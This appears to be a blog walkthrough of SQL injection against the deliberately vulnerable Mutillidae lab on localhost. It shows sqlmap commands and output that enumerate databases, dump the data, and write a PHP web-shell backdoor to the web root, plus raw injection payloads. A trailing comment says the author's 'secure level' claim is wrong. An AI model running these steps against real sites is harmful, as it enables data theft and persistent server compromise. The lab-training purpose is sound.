This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker.
SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. (wikipedia)
I will use mutillidae (http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10) to try MySql Injection, and I use Security Level 5 (Secure)
then, I setup the firefox to connect through Burpsuite proxy, so I can see the send data.
after the proxy has set then I just click "View Account Details" button then the Burpsuite will get the sending data
Then I try to test the Sql Injecttion using sqlmap
it seems the injection is working, then I will dump the database
Then, I need to create backdoor
Game Over..!!
after the proxy has set then I just click "View Account Details" button then the Burpsuite will get the sending data
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" --dbs
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:59:29
[23:59:29] [INFO] resuming back-end DBMS 'mysql'
[23:59:29] [INFO] testing connection to the target url
[23:59:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=' AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e74653a,(SELECT (CASE WHEN (3845=3845) THEN 1 ELSE 0 END)),0x3a7479613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vRDK'='vRDK&password=&user-info-php-submit-button=View Account Details
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: username=' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6e74653a,0x6a71624950584e6e735a,0x3a7479613a), NULL, NULL, NULL#&password=&user-info-php-submit-button=View Account Details
---
[23:59:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[23:59:34] [INFO] fetching database names
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] sips
[23:59:34] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/127.0.0.1'
[*] shutting down at 23:59:34
root@bt:/pentest/database/sqlmap#
it seems the injection is working, then I will dump the database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" -D owasp10 --dump-all
Then, I need to create backdoor
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" --file-write="/pentest/backdoors/web/webshells/php/simple-backdoor.php" --file-dest="/var/www/mutillidae/back.php"
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:28:50
[00:28:50] [INFO] resuming back-end DBMS 'mysql'
[00:28:50] [INFO] testing connection to the target url
[00:28:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=' AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e74653a,(SELECT (CASE WHEN (3845=3845) THEN 1 ELSE 0 END)),0x3a7479613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vRDK'='vRDK&password=&user-info-php-submit-button=View Account Details
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: username=' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6e74653a,0x6a71624950584e6e735a,0x3a7479613a), NULL, NULL, NULL#&password=&user-info-php-submit-button=View Account Details
---
[00:28:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:28:51] [INFO] fingerprinting the back-end DBMS operating system
[00:28:51] [INFO] the back-end DBMS operating system is Linux
do you want confirmation that the file '/var/www/mutillidae/back.php' has been successfully written on the back-end DBMS file system? [Y/n] y
[00:28:53] [INFO] the file has been successfully written and its size is 332 bytes, but the size differs from the local file '/pentest/backdoors/web/webshells/php/simple-backdoor.php' (328 bytes)
[00:28:53] [WARNING] expect junk characters inside the file as a leftover from UNION query
[00:28:53] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/127.0.0.1'
[*] shutting down at 00:28:53
root@bt:/pentest/database/sqlmap#
Game Over..!!
Are you sure?? Mutillidae uses sessions to active security level. So, your sqlmap is using level 0 to exploit and extract the vulnerability. If you use the payload show by sqlmap, you cann´t exploit the vulnerability.